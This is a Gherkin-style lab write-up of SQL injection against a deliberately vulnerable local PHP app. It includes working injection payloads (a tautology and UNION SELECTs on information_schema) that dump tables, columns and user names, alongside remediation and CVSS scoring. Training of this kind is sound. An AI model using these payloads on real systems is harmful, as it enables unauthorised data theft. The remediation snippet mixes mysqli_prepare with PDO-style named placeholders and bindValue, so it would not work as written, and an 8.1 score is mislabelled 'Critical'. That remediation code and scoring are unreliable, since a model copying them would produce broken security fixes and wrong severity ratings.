## Version 1.4.1
## language: en

Feature:
  TOE:
    Vulnerable Web Application
  Category:
    SQL injection
  Location:
    http://localhost/vwa/SQL/sql1.php - firstname (field)
  CWE:
    CWE-89: Improper Neutralization of Special Elements used
    in an SQL Command ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Inject SQL to get valuable information
  Recommendation:
    Use prepared statements with variable bindings

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Windows OS      | 10          |
    | Firefox         | 68.0.1      |
  Machine information:
    Given I am accesing the site
    """
    http://localhost/vwa/SQL/sql1.php
    """
    And A field to search some First name
    And The app is running on XAMPP v3.2.4

  Scenario: Normal use case
    Given A field to query a first name then get the last name as a result
    When I type 'John' i get as response 'Doe'
    Then I try to consult different words and numbers

  Scenario: Static detection
    When I watch the source code
    Then I can see this code inside an if condition
    """
    $firstname = $_POST["firstname"];
    $sql = "SELECT lastname FROM users WHERE firstname='$firstname'";//String
    """
    And I can see the variable and the query are not sanitized

  Scenario: Dynamic detection
    When I try to force an error by typing special characters like "1' "
    Then I get this message
    """
    Warning: mysqli_num_rows() expects parameter 1 to be mysqli_result,
    bool given in C:\xampp\htdocs\vwa\SQL\sql1.php on line 43
    0 results
    """
    And I realize that it recognizes SQL queries
    And The query receives 1 column

  Scenario: Exploitation
    When I type in the URL the following text
    """
    1' or '1'='1' ##
    """
    Then I get all 4 lastnames
    """
    Doe
    Carrol
    Batman
    Devil
    """
    When I type this query in the field
    """
    1' union select table_name from information_schema.tables ##
    """
    Then I get all the tables as a response
    And I can identify a users table
    When I type this query in the field to get the schema for the users table
    """
    1' union select column_name from information_schema.columns
    where table_name=char(117,115,101,114,115) ##
    """
    Then I get as a response the names of the columns
    And I can identify a column named "firstnames"
    And After this i'm going to extract the first names from the database
    When I type this query in the field
    """
    1' union select firstname from users ##
    """
    Then I get as a response all 4 firstnames
    """
    John
    Alice
    Bruce
    Dare
    """
    And I can now search for all the firstnames and get the lastnames

  Scenario: Remediation
    When A developer makes a search/query field like this one
    And Identifying that it just searches for user lastnames
    Then He can use variable binding to make the field safer
    """
    $stmt = mysqli_prepare(
    $conn, "SELECT lastname FROM users WHERE firstname = :firstname"
    );
    /* $conn is the conection variable */
    $stmt->bindValue(':firstname', $firstname);
    """
    And If a user tries to send some SQL from the field it will recognize it
    And As a string value and not as SQL code for the code
    Then The query will look for a user lastname with these values instead of
    And adding the input to the query
    And The vulnerability could be fixed

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.5/10 (Medium) - E:F/RL:W/RC:U
  Environmental: Unique and relevant attributes to a specific user environment
    8.1/10 (Critical) - CR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2019-08-01
